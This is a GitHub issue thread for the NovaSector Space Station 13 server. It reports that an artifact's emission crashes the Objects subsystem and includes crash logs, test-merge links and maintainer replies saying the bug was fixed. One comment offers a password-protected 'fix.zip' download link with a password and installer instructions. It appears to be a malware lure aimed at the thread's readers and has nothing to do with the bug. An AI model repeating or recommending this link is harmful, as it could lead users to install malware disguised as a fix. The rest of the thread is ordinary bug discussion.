### ISSUE TITLE
anomaly battery (/datum/artifact_effect) emission crashes subsystem Objects

### ISSUE THREAD

**Issue by tobjv** [NovaSector/NovaSector#4315]
### Client Version:

515.1639

### Issue Summary:

ADMIN LOG: anomaly battery (/datum/artifact_effect) emission started
ERROR: The Master Controller code stack has exited unexpectedly, Restarting...
MC restarted successfully

ADMIN LOG: anomaly battery (/datum/artifact_effect) emission started
ERROR: The Master Controller code stack has exited unexpectedly, Restarting...
The Objects subsystem was the last to fire for 2 controller restarts. It will be recovered now and disabled if it happens again.
MC restarted successfully

ADMIN LOG: anomaly battery (/datum/artifact_effect) emission started
ERROR: The Master Controller code stack has exited unexpectedly, Restarting...
The Objects subsystem seems to be destabilizing the MC and will be put offline.
MC restarted successfully.

THESE ARE PRINTABLE OBJECTS

### Round ID:

[11534](https://scrubby.melonmesa.com/round/11534)

### Test Merge Information:

- [[TESTING ONLY] Debugging overlay cap being reached with taur parts](https://github.com/NovaSector/NovaSector/pull/2754)
- [Revert "[MIRROR] Refactor Stat Panel styles and more TGUI-like appearance [MDB IGNORE]"](https://github.com/NovaSector/NovaSector/pull/4095)
- [Xenoarchaeology Artifacts](https://github.com/NovaSector/NovaSector/pull/4281)
- [Plutonian 'Sapper Gang' Mid-Round](https://github.com/NovaSector/NovaSector/pull/4069)
- [[MODULAR] Digitigrade Augs  Limb Support](https://github.com/NovaSector/NovaSector/pull/4297)

### Reproduction Steps:

Print or find this artifact and use it.

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Microvolnovka19** [comment]
Huh, interesting. Will take a look at it closer.

**Comment by Microvolnovka19** [comment]
Should be fixed.

**Comment by Sadboysuss** [comment]
> Should be fixed.

What pr fixed this

**Comment by Microvolnovka19** [comment]
> > Should be fixed.
> 
> What pr fixed this

A few last commits on Xenoarch PR. It is Test Merged and still open.

**Comment by Sadboysuss** [comment]
> A few last commits on Xenoarch PR. It is Test Merged and still open.

Link it to this issue: `Closes https://github.com/NovaSector/NovaSector/issues/4315`

**Comment by Sadboysuss** [comment]
we have no test merge bug label
